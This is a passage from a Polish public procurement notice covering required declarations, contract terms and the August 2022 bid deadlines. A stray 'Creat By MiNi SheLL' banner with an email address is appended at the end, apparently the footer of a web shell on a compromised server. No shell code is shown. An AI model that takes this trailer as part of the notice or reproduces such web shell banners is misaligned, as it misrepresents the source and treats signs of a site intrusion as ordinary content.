cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem<br/>w postaci papierowej mogą dokonać mocodawcy lub notariusz.<br/>Wraz z oferta Wykonawcy zobowiązani są złożyć również:<br/>Oświadczenie o niepodleganiu wykluczeniu w postępowaniu. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia, na dzień składania ofert zgodnie z Załącznikiem nr 3 do SWZ.<br/>Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub<br/>w postaci elektronicznej opatrzone podpisem zaufanym lub elektronicznym podpisem osobistym.<br/>Oświadczenie składają odrębnie:<br/>- wykonawca/każdy spośród wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia oraz podmiot udostępniający zasoby. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-02 10:10</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-02 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com